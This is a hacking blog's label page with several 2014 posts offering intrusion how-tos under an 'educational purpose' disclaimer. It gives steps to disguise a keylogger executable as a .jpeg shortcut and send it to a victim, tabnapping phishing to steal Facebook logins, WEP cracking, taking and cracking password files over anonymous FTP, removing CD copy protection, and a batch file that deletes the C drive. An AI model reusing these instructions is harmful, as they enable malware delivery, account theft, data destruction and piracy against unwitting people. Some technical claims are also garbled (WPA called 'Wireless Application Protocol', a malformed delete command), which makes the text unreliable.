Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Friday, 15 August 2014

How to hack wifi networks

wifi hacked

Note : Only For Educational Purpose.>!!!
1) First we need to scan for available wireless networks.
Theres this great tool for windows to do this.. called “NetStumbler” or Kismet
for Windows and Linux and KisMac for Mac.

The two most common encryption types are:
1) WEP
2) WAP

WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas WAP is currently the most secure and best option to secure a wi-fi network.. It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack. Here I’ll tell you how to Crack WEP

To crack WEP we will be using Live Linux distribution called BackTrack to
crack WEP.
BackTrack have lots of preinstalled softwares for this very purpose..
The tools we will be using on Backtrack are:
Kismet – a wireless network detector
airodump – captures packets from a wireless router
aireplay – forges ARP requests
aircrack – decrypts the WEP keys
1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.

Monday, 4 August 2014

Hide keyloggers in a .jpg file

                              Hide keyloggers in a .jpg file    


Note : Only For Educational Purpose.>!!!

Through this trick you can easily hide keyloggers. First download any key logger from google i think Ardamax is best. After installing just follow these easy steps=>

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is
checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see
hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. Let's say it's called 'server.exe' (that's why
you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :- 'C:\WINDOWS\system32\cmd.exe / c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi'
you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click
that and a new window will pop up and you have to write this :-  %SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'. This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Saturday, 2 August 2014



                                                            OPEN RUN COMMAND.

                                                                TYPE regedit IN IT.

                                             SEARCH FOR HKEY_LOCAL_MACHINE

                                                              CLICK ON IT

                                                         SEARCH FOR SYSTEM

                                                           CLICK ON IT.

                                                             SEARCH FOR CURRENTCONTROLSET

                                                                CLICK ON IT

                                                             SEARCH FOR SERVICES

                                                                 CLICK ON IT

                                                  SEARCH FOR USBSTOR

                                                     CLICK ON IT






Saturday, 12 July 2014

Increase Internet Speed Upto 300% (Firefox Only)

       Increase Internet Speed Upto 300% (Firefox Only) 

This is a short trick on how to increase your internet 300% Faster or higher.
So That You Can =>
* Increase your browsing experience
* Play online games LAG free
* Load videos almost instantly
* Turn your slow internet connection into Broadband DSL or even T1
* Download anything faster with our “intelligent packet configurator”
* Increase Speeds Up To 375% Faster!

Friday, 11 July 2014

Hacking FB Accounts Using Tabnapping

              Hacking FB Accounts Using Tabnapping

            Note : Only For Educational Propose..!!!


Tab Napping:

 Tab Napping is new hacking trick through which you can't directly hack account
and you will be using phishing method with tab napping then you can hack account. Actually
Tab Napping is a script which you put into a site/blog and when the user visit your website/blog
and read your article or play game or watch video, when user goto other tab in browser which
contain other website like youtube,google etc and came back to your website then your
website will be redirected to the phishing page and telling them to login with
facebook/gmail/yahoo account to continue.When user enter login information he/she will be
back to your page and user password will be send to you.
So lets see how to hack facebook account using tab napping trick.


1) First of all you have a web hosting (website) and if you don't have your own website then
create Free website with following website :

or you can search on google and create an account.

2) Now download the script and phishing pages from here:

3) Extract it and you will see the files and folders like below:


 4) Upload all the files and folders to your website.
when you upload it's look like

5)The website contain a game and send your website address(your tab napping
website where you upload all the files) to your friend or anyone else whose
facebook account you want to hack and tell him/her that if your are intelligent or
smart or say anything else then play this game and win it.

The website look like this:

Actually the game is very dificult and he/she will not win in less time and he/she
will goto another tab in browser like facebook,google,youtube ,yahoo etc and
when he/she came back to the website , it will be automatically redirected and
saying them to login with facebook account to continue.

What are Hackers

                                 What are Hackers

A hacker is someone who likes to tinker with electronics or computer
systems. Hackers like to explore and learn how computer systems work,
finding ways to make them do what they do better, or do things they
weren’t intended to do. 

Tuesday, 10 June 2014

Transparent Proxies in Squid

                        Transparent Proxies in Squid

With, the extremely uncontrollable growth in the number of Hackers, not only system administrators of servers have
to worry about the security of their system, but even if you are running a standalone PPP Linux box, you simply cannot afford to ignore your system's security.
If your system is the main server which communicates with the external untrusted network called the Internet, or even if you simply use your linux box to connect to your ISP and surf the net through PPP, then you should definitely think about installing a firewall on your system.
The preferable and the best option in this case is to install a commercial firewall. However, this option is not always possible and is more often than not unnecesarry. Buying, installing and configuring a good commercial firewall is not only expensive but most beginners find it pretty formidable. OK, I do not want to go through the hassle of a commercial firewall, what do I do? Well, 'ipchains' hold the key for you.
The Firewalling code in the Linux Kernel chnaged considerably after the release of Kernel 2.2. Since then, a lot of new utilites and features have been added. Amongst these improvements, is a kewl feature called 'ipchains', which is primariarly used for configuring the firewalling rules and other such related details.

Monday, 14 April 2014

Getting the Password File Through FTP

  Getting the Password File Through FTP


  Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a
  webpage. First you need learn a little about the password file...

  TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
  BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

  This is an example of a regular encrypted password file. The Superuser is the part that gives you root.
  That's the main part of the file.

  ftp:x:202:102:Anonymous ftp:/u1/ftp:
  ftpadmin:x:203:102:ftp Administrator:/u1/ftp

  This is another example of a password file, only this one has one little difference, it's shadowed.
  Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file:

  smtp:x:0:0:mail daemon user:/:
  listen:x:37:4:Network Admin:/usr/net/nls:
  nobody:x:60001:60001:uid no body:/:
  noaccess:x:60002:60002:uid no access:/:
  webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
  pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
  ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

  Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an
  * as well.

  Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.

  Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you.

Thursday, 10 April 2014

How to Crack CD Protections

How to Crack CD Protections


1). About, Programs needed … etc.
2). The easy protection. 
3). Finding the right file – and the right error. 
4). Finding the right line number. 
5). Editing the line. 
6). Testing. 
7). Quick order list.   Here we go (again)!   

Chapter I: About, Programs needed … etc. 
Tutorial, that explains all about RiPPing except how to crack the CD  protections… so here is the other part – how to finish the RiPPing by cracking  the protection. This will help you w/ the most basic system of protection,  called C- dilla, that is the most usual one…    The programs we will use are 2: first, and decompiler – the files we will  work with are in ExE format, and we need a program that will HeX them (transfer  to 16 base, hexa, form) and locate the orders given in the code, then we will  find the line we need and change it to remove the protection with... – the  second program: we need a program that will *edit* the files, and fetch the  right line number we got using the first program… all those action are easly  done w/ the programs: Win32Dasm (the disassembler - decompiler program, added in  the dir [root/Win32Dasm]), and Hiew (the editing program added in the dir  [root/Hiew]). The programs are added to the tutorial, because I’m not so sure  you can find then on a stable location on the net, in the dir [root/programs].

Chapter II: The easy protection.  
Okay! To save you from reading this entire tutorial for nothing you’re not going  to use I made this chapter, because there is a good chance you won’t be needing  it!     Some games comes w/ protection as a files in the [/Setup] dir (or root  dir) called:  [00000001.TMP], [CLCD16.DLL], [CLCD32.DLL] and most important  [CLOKSPL.EXE]... if you see any of them delete it and the protection should  disappear (Important! delete them after making a mirror of the game on your HD,  using the info in the next chapter) … if you are still getting an error message  just keep on reading.

Sunday, 2 March 2014


Learn To Make Dangerous Virus In A Minute

computer virus
In my previous post i had teach you guysto create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet verypowerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thingabout this virus is it is not detected by any AntiVirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.